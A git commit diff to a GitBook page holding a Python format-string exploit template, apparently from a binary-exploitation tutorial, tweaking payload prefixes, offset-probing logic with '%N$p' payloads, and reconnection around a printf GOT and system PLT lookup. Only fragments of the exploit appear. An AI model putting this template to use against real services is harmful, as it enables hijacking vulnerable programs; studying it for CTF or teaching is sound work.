GitBook: [master] one page modified

2021-10-08 00:22:38 +00:00 · 2021-10-08 00:22:38 +00:00 · ad909ac7ea
commit ad909ac7ea
parent 99765a813f
1 changed files with 5 additions and 4 deletions
--- a/exploiting/linux-exploiting-basic-esp/format-strings-template.md
+++ b/exploiting/linux-exploiting-basic-esp/format-strings-template.md
@ -20,9 +20,9 @@ REMOTE_BIN = "./tyler" #For ssh

 # In order to exploit the format string you may need to append/prepend some string to the payload
 # configure them here
-PREFIX_PAYLOAD = b"echo "
+PREFIX_PAYLOAD = b""
 SUFFIX_PAYLOAD = b""
-NNUM_ALREADY_WRITTEN_BYTES = 70
+NNUM_ALREADY_WRITTEN_BYTES = 0
 MAX_LENTGH = 999999 #Big num if not restricted

 print(" ====================== ")
@ -79,7 +79,7 @@ def get_formatstring_config():
        if b"41" in recieved:
            for padlen in range(0,4):              
                if b"41414141" in recieved:
-                    if not P.connected(): connect_binary()
+                    connect_binary()
                    payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
                    recieved = send_payload(payload).strip()
                    print(recieved)
@ -88,6 +88,7 @@ def get_formatstring_config():
                        return offset, padlen
                
                else:
+                    connect_binary()
                    payload = b" " + payload
                    recieved = send_payload(payload).strip()

@ -120,7 +121,7 @@ P_GOT = ELF_LOADED.got["printf"]
 log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
 log.info(f"Printf GOT address: {hex(P_GOT)}")

-if not P.connected(): connect_binary()
+connect_binary()
 if GDB and not REMOTETTCP and not REMOTESSH:
    # attach gdb and continue
    # You can set breakpoints, for example "break *main"